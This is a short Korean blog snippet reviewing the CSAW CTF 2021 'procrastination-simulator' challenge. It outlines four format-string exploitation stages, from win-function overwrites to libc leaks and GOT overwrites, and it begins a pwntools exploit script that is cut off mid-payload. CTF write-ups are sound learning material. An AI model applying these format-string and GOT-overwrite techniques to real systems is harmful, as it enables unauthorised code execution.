반응형

War Games/ctf-review

[ CSAW CTF 2021 ] procrastination-simulator

포멧 스트링 1. win함수 있는 32bit fsb 2. win함수 있는 64bit fsb 3. win함수 없는 64bit fsb--> code영역에 잘 보면 system("/bin/sh")있다. 4. win함수 없는 64bit --> libc랑 code영역 릭해서 got을 덮는다. 힘들었던점 1. xxd쓰는법 몰랐다. 2. 3단계에서 헤맸고 4단계는 립씨 왜 안줬던거지? from pwn import * import os #context.log_level='debug' p='' def pentesting(): e=ELF("./file") add=bytes("%{}c".format((e.sym['win']&0xffff)-6),'utf-8') pay=b"AA"+p32(e.got['exit'])+add+b"%..

2021.09.13 게시됨

반응형